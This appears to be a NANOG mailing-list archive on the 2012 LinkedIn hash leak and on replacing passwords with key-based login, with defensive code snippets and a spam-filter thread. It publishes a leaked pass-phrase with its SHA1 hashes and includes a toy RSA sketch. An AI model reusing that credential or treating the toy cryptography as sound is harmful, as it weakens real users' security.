my work computer, one on my USB drive, etc...  If I lose my USB key, I
can revoke the SSH key and still have access from my home computer.

And I'm sure someone would come up with the 'solution' where they
store the keys for you, but only you have the passphrase...ala
lastpass.

-A


As far as apps go, loads of them use OAuth and have a browser step in
their setup.


So this adds precisely one step to the smartphone sync/activation
process - downloading the key pair from your PC (or if you don't have a
PC, generating one).


that covers vendor A and most vendor G devices. "what about the feature
phones?" - not an issue, no apps to speak of, noOp(). "what about
[person we want to be superior to who is always female for some
reason]?" - well, they all seem to have iPhones now, so *somebody's*
obviously handholding them through the activation procedure.


obviously vendor A would be tempted to "sync this to iCloud"...but
anyway, I repeat the call for a W3C password manager API. SSH would be
better, but a lot of the intents, actions etc are the same.





Re: LinkedIn password database compromised

2012-06-21 Thread AP NANOG
While I am not disagreeing with your statements, I am also not 
convinced they will work.  What I am doing is playing devil's advocate, 
hoping to stir all of our gray matter for ideas; maybe something said 
here may end up being the fix.


However, which thread do we want to continue this conversation in?

"LinkedIn password database compromised"

or

"How to fix authentication (was LinkedIn)"

:-)

- Robert Miller
(arch3angel)

On 6/21/12 11:05 AM, Leo Bicknell wrote:

I want to start by saying there are lots of different security problems
with accessing a "cloud service".  Several folks have already brought up
issues like compromised user machines or actually verifying identity.

One of the problems in this space I think is that people keep looking
for a silver bullet that magically solves all the problems.  It doesn't
exist.  We need a series of technologies that work with each other.

In a message written on Thu, Jun 21, 2012 at 10:43:44AM -0400, AP NANOG wrote:

How will this prevent man in the middle attacks, either at the users
location, the server location, or even on the compromised server itself
where the attacker is just gathering data.  This is the same concerns we
face now.

There is a sign-up problem.  You could sign up with a MITM web site,
which then signs you up with the real web site.

There are a number of solutions: you can try to prevent the MITM attack
with something like DNSSEC, and/or verify the identity of the web site with
something like X.509 certificates verified by a trusted party.  The
first exchange could send public keys in both directions, reducing the
threat to a sign-up-time attack only; once the relationship is established,
public keys are used in both directions and, done right, the channel is
impervious to a MITM attack.

Note that plenty of corporations "hijack" HTTPS today, so MITM attacks
are very real and work should be done in this space.
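One low-ceremony way to narrow the MITM window is trust-on-first-use key pinning, the same model SSH uses with known_hosts. A minimal sketch (the store layout and function names are mine, not from any real browser):

```python
import hashlib

def key_fingerprint(pubkey_bytes: bytes) -> str:
    # a stable fingerprint of the server's public key
    return hashlib.sha256(pubkey_bytes).hexdigest()

def check_pin(pins: dict, site: str, pubkey_bytes: bytes) -> bool:
    """Trust-on-first-use: remember the key at first contact,
    and flag any later change as a possible MITM."""
    fp = key_fingerprint(pubkey_bytes)
    if site not in pins:
        pins[site] = fp      # first contact: pin this key
        return True
    return pins[site] == fp  # later contact: must match the pinned key
```

As with SSH, this only shrinks the exposure to the first exchange; something like DNSSEC or X.509 validation is still needed to protect the sign-up itself.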


Second is regarding the example just made with "bickn...@foo.com" and
super...@foo.com.  Does this not require the end user to have virtually
endless number of email addresses if this method would be implemented
across all authenticated websites, compounded by numerous devices
(iPads, Smartphones, personal laptop, work laptop, etc..)

Not at all.  Web sites can make the same restrictions they make
today.  Many may accept my "bickn...@ufp.org" key and let me use
that as my login.  A site like gmail or hotmail may force me to use
something like bickn...@gmail.com, because it actually is an e-mail,
but it could also give me the option of using an identifier of my
choice.

While I think use of e-mails is good for confirmation purposes, a
semi-anonymous web site that requires no verification could allow
a signup with "bob" or other unqualified identifier.

It's just another name space.  The browser is going to cache a mapping
from web site, or domain, to identifier, quite similar to what it does
today...

Today:
   www.facebook.com, login: bob, password: secret

Tomorrow:
   www.facebook.com, key: bob, key-public: ..., key-private: ...
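That mapping is easy to picture as a small store keyed by site, with room for more than one identity per site (a toy sketch; the field names are illustrative, not any real browser's schema):

```python
# today: site -> login/password; tomorrow: site -> one or more keypairs
today = {
    "www.facebook.com": [{"login": "bob", "password": "secret"}],
}
tomorrow = {
    "www.facebook.com": [
        {"key_id": "bob",      "public": "<pubkey-1>", "private": "<privkey-1>"},
        {"key_id": "superbob", "public": "<pubkey-2>", "private": "<privkey-2>"},
    ],
}

def identities_for(store: dict, site: str) -> list:
    # with more than one match the browser would prompt
    # "use identity A or identity B", just as with SSL client certs
    return [e.get("login") or e.get("key_id") for e in store.get(site, [])]
```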








Re: LinkedIn password database compromised

2012-06-21 Thread AP NANOG
I have two concerns with this thought, while at the same time intrigued 
by it.


How will this prevent man in the middle attacks, either at the users 
location, the server location, or even on the compromised server itself 
where the attacker is just gathering data.  This is the same concerns we 
face now.


Second is regarding the example just made with "bickn...@foo.com" and 
super...@foo.com.  Does this not require the end user to have virtually 
endless number of email addresses if this method would be implemented 
across all authenticated websites, compounded by numerous devices 
(iPads, Smartphones, personal laptop, work laptop, etc..)


Again I think this conversation is on the right track, but ultimately a 
form of two factor authentication method such as pub/priv, Wikid, etc.. 
is needed.


On 6/20/12 6:28 PM, Leo Bicknell wrote:

In a message written on Wed, Jun 20, 2012 at 03:05:17PM -0700, Aaron C. de 
Bruyn wrote:

You're right.  Multiple accounts is unpossible in every way except
prompting for usernames and passwords in the way we do it now.
The whole ssh-having-multiple-identities thing is a concept that could
never be applied in the browser in any sort of user-friendly way.


Aw come on guys, that's really not hard, and code is already in the
browsers to do it.

If you have SSL client certs and go to a web site which accepts
multiple domains you get a prompt, "Would you like to use identity
A or identity B."  Power users could create more than one identity
(just like more than one SSH key).  Browsers could even generate
them behind the scenes for the user "create new account at foo.com"
tells the browser to generate "bickn...@foo.com" and submit it.  If
I want another a quick trip to the menu creates "super...@foo.com"
and saves it.  When I go to log back in the web site would say "send
me your @foo.com" signed info.

Seriously, not that hard to do and make seamless for the user; it's all
UI work, and a very small amount of protocol (HTTP header, probably)
update.
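Creating such a throwaway identity needs no CA at all; a self-signed client cert works today with stock OpenSSL (the filenames and CN below are illustrative):

```shell
# generate an identity-free client keypair for foo.example
openssl genrsa -out foo.example.key 2048

# wrap the public half in a self-signed cert; the CN is just a label,
# not a verified real-world identity
openssl req -new -x509 -key foo.example.key -out foo.example.crt \
    -days 365 -subj "/CN=bob@foo.example"

# inspect the label the site would see
openssl x509 -in foo.example.crt -noout -subject
```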

In a message written on Wed, Jun 20, 2012 at 02:54:10PM -0700, Matthew Kaufman 
wrote:

Yes. Those users who have a single computer with a single browser. For
anyone with a computer *and* a smartphone, however, there's a huge
missing piece. And it gets exponentially worse as the number of devices
multiplies.

Yeah, and no one has that problem with a password.

Ok, that was overly snarky.  However people have the same issue
with passwords today.  iCloud to sync them.  Dropbox and 1Password.
GoodNet.  Syncing certs is no worse than syncing passwords.

None of you have hit on the actual down side.  You can't (easily) log in
from your friends computer, or a computer at the library due to lack of
key material.  I can think of at least four or five solutions, but
that's the only "hard" problem here.

This has always failed in the past because SSL certs have been tied to
_Identity_ (show me your drivers license to get one).  SSH keys are NOT,
you create them at will, which is why they work.  You could basically
co-opt SSL client certs to do this with nearly zero code, provided people
were willing to give up on the identity part of X.509, which is
basically worthless anyway.







Re: LinkedIn password database compromised

2012-06-20 Thread AP NANOG

Exactly!

Passwords = Fail

All we can do is make it as difficult as possible for them to crack
until the developers decide to build the pretty eye candy.


- Robert Miller
(arch3angel)

On 6/20/12 3:43 PM, Leo Bicknell wrote:

In a message written on Wed, Jun 20, 2012 at 03:30:58PM -0400, AP NANOG wrote:

So the question falls back on how can we make things better?

Dump passwords.

The tech community went through this back in oh, 1990-1993 when
folks were sniffing passwords with tcpdump and sysadmins were using
Telnet.  SSH was developed, and the problem was effectively solved.

If you want to give me access to your box, I send you my public
key.  In the clear.  It doesn't matter if the hacker has it or not.
When I want to log in I authenticate with my private key, and I'm
in.

The leaks stop immediately.  There's almost no value in a database of
public keys, heck if you want one go download a PGP keyring now.  I can
use the same "password" (key) for every web site on the planet, web
sites no longer need to enforce dumb rules (one letter, one number, one
character your fingers can't type easily, minimum 273 characters).

SSL certificates could be used this way today.

SSH keys could be used this way today.

PGP keys could be used this way today.

What's missing?  A pretty UI for the users.  Apple, Mozilla, W3C,
Microsoft IE developers and so on need to get their butts in gear
and make a pretty UI to create personal key material, send the
public key as part of a sign up form, import a key, and so on.

There is no way to make passwords "secure".  We've spent 20 years
trying, simply to fail in more spectacular ways each time.  Death to
traditional passwords, they have no place in a modern world.
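The flow Leo describes is plain challenge–response: the site stores only your public key, sends a fresh nonce, and you prove possession of the private key by signing it. A toy sketch with deliberately tiny RSA numbers, only to show why a leaked database of public keys is worthless (never roll your own crypto in practice):

```python
import hashlib

# toy RSA parameters -- real keys are 2048+ bits from a vetted library
P, Q = 61, 53
N = P * Q                          # public modulus
E = 17                             # public exponent (stored by the web site)
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (stays with the user)

def _digest(challenge: bytes) -> int:
    return int.from_bytes(hashlib.sha256(challenge).digest(), "big") % N

def sign(challenge: bytes) -> int:
    # only the private-key holder can produce this
    return pow(_digest(challenge), D, N)

def verify(challenge: bytes, signature: int) -> bool:
    # anyone holding just (N, E) can check it -- leaking (N, E) costs nothing
    return pow(signature, E, N) == _digest(challenge)
```

The server never holds a reusable secret: each login signs a fresh nonce, so a breached "password database" of public keys contains nothing an attacker can replay.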







Re: LinkedIn password database compromised

2012-06-20 Thread AP NANOG
I normally don't respond and just sit back leeching knowledge, however 
this incident with LinkedIn & eHarmony strikes close to home.  Not just 
because my password was in this list of dumped LinkedIn accounts, but 
because this incident struck virtually every business professional 
and corporation across the world.  Please bear with me while I ramble a 
few thoughts...


The real problem with authentication falls on "trust".  You either have 
to trust the website is storing the data securely or some other party 
will verify you are who you really are.  Just as in the example of the 
DMV.  If you think about your daily life you have put your entire life 
on display for the world.  You trust the DMV with your drivers license 
information, address, social security number, heck they are even asking 
for email now.  If you're active or prior military you have given that 
same information, plus DNA and fingerprints.  Think about how much 
information about you and your habits is revealed simply by using 
"rewards" cards or "gas points".  You, meaning users, give up your 
identity every day with little regard, but when it comes to a website or 
tracking you across websites we throw our hands up and scream "stop".


Please don't get me wrong, I am a HUGE fan boy of privacy and protection 
of data, but responsibility ultimately falls back on the user.  Those 
users who do not know any better are still at fault, but it is our job 
to educate them in better methods of protection.


So the question falls back on how can we make things better?

The fact that we must trust people outside ourselves is key.  We need to 
explain the importance of things such as KeePass (http://keepass.info/), 
and pass-phrases, rather than words.  Below is an example: my password, 
which was leaked during the LinkedIn dump, but until I started using it 
as an example the likelihood of the hash being cracked was VERY 
slim.  Use this as an example of how to select a password for websites, 
and of how, even if the hashes are dumped, the likelihood of cracking them is slim.


Password:  !p3ngu1n_Pow3r!
SHA1 Hash: b34e3de2528855f02cf9ed04c217a15c61b35657
LinkedIn Hash: 0de2528855f02cf9ed04c217a15c61b35657
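A local check like the script mentioned later in this post boils down to a few lines of Python. Dumped LinkedIn entries had some of their leading hex digits zeroed out, so the sketch below also compares on the trailing digits (the exact suffix length is an assumption on my part):

```python
import hashlib

def sha1_hex(password: str) -> str:
    # unsalted SHA1, as LinkedIn used it
    return hashlib.sha1(password.encode()).hexdigest()

def in_dump(password: str, dumped_hashes: set) -> bool:
    # compare the full 40-digit SHA1, and also the trailing 35 digits to
    # catch dump entries whose leading digits were zeroed out
    h = sha1_hex(password)
    return h in dumped_hashes or any(d.endswith(h[-35:]) for d in dumped_hashes)
```

Running this on your own machine avoids ever pasting a live password into a third-party "was I breached?" web site.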

To crack this pass-phrase using the following systems, it would take 
the associated amount of time:


$180,000 cracker: roughly 2 decades, 7 years to complete the crack
$900 cracker: 3 centuries, 3 decades to complete the crack
Average graphics card: 15 centuries to complete the crack
Average desktop computer: 795 centuries to complete the crack

Now what does this mean in the scheme of things?  You cannot trust any 
website, third party identity verification, one time password, etc.  You 
can only trust yourself in creating a password that even if dumped will 
make it nearly impossible to crack.  Use some form of nomenclature to 
identify a website separate from the base pass-phrase, thus giving you 
individual "passwords" and in turn if one site gets dumped the others 
remain safe.
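One way to make that per-site nomenclature systematic is to derive each site's password from the base pass-phrase with a key-derivation function, so no one site's dump reveals anything about the others (a sketch; the iteration count and output length are arbitrary choices of mine):

```python
import base64
import hashlib

def site_password(base_passphrase: str, site: str) -> str:
    # one strong base pass-phrase in your head; a distinct derived
    # password per site, so one breached site exposes only itself
    raw = hashlib.pbkdf2_hmac("sha256", base_passphrase.encode(),
                              site.encode(), 100_000)
    return base64.b64encode(raw).decode()[:16]
```

The derivation is deterministic, so nothing needs to be stored; the same base pass-phrase always regenerates the same per-site password.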


Practicality is more along the lines of what the solution is.  It is not 
practical to develop a pub/priv solution because of the users 
themselves; it is, however, practical to educate everyone we meet, 
showing them how simple changes can increase their 
protection tenfold.


A similar question though comes from "Website xyz.com was just dumped, 
how do I know if my password was in this group?".  Just from previous 
experience, organizations release the warning stating they had a breach, 
but it normally takes a good bit of time, as seen with LinkedIn, for 
them to release who was part of the dump, if they ever really do; 
sometimes it becomes a blanket "We were breached, please change your 
password" story.  If a website you have been using is breached then I 
revert back to the original statement saying that the issue becomes 
trust.  In the early days of LinkedIn websites claiming to check your 
password against the database dump were popping up left and right.  Is 
it truly wise to jump to these sites and put your password, which 
potentially will take decades to crack, into a website that merely claims to 
check it without storing it anywhere?  I know there are sites 
which were created by companies and individuals with outstanding 
reputations, however it was outside my control and thus not trusted.  I 
decided to write a small, very simple, Python script that will run on 
your local machine and allow you to check your password against the dump 
of hashes.  Right now it only handles the LinkedIn dumps, but my goal is to 
support any dump: all you have to do is point it at the file.  I also 
decided to take a little longer on the next release and learn to code 
a GUI for users who may not be techies.  I will continue to work on the 
GUI release; if you want it, email me and I'll make 
sure you are aware of its release.


Until then I hope this helps those who

Re: Barracuda Networks is at it again: Any Suggestions as to an Alternative?

2011-04-13 Thread AP NANOG

I would look into Asatro; they have a solid product and good support.

If you want a contact person let me know and I will email you directly.

On 4/9/11 11:55 AM, pr...@cnsny.net wrote:

Andrew,
We use and offer Postini - a front-end service.  Postini is an anti-virus and 
spam filter, and can spool mail if your circuits are down.  Postini is a 
Google company and works like a charm.  If you need more information please 
contact me offline pr...@cnsny.net

Paul

Sent from my Verizon Wireless Phone

- Reply message -
From: "Andrew Kirch"
Date: Sat, Apr 9, 2011 10:39 am
Subject: Barracuda Networks is at it again: Any Suggestions as to an Alternative?
To: "John Palmer (NANOG Acct)",

John,

My suggestion isn't _QUITE_ an appliance, but it works very well and
I've been exceptionally happy with it.  It's a distribution of linux
controlled via a web interface that does far more than just mail
filtering (at which it is both flexible and adept).  Take a look at
http://www.clearfoundation.com/Software/overview.html.  The hardware
requirements shouldn't be too insane, and the rules
updates/subscriptions for the various services are all month to month,
and not a bucket of insane.

Andrew


On 4/8/2011 11:51 PM, John Palmer (NANOG Acct) wrote:

OK, its been a year since my Barracuda subscription expired. The unit
still stops some spam. I figured that I would go and see what they
would do if I tried to renew my subscription EXACTLY one year after it
expired. Would their renewal website say "Oh, you are at your
anniversary date", and renew me for a year?

No such luck: They want me to PAY FOR AN ENTIRE YEAR for which I did
NOT receive service and then for the current (upcoming year). Sorry -
I don't allow myself to be ripped off like that. Sorry Barracuda - you
get no money from me and I'll tell everyone I know about this policy
of yours.

I posted an article about this unscrupulous practice on my blog last
year at http://www.john-palmer.net/wordpress/?p=46

My question is - does anyone have any suggestions for another e-mail
appliance like the Barracuda Spam Firewall that doesn't try to charge
their customers for time not used. I should be able to shut off the
unit for a year or whatever and simply renew from the point that I
re-activate the unit instead of having to pay for back-years that I
didn't use.

Thanks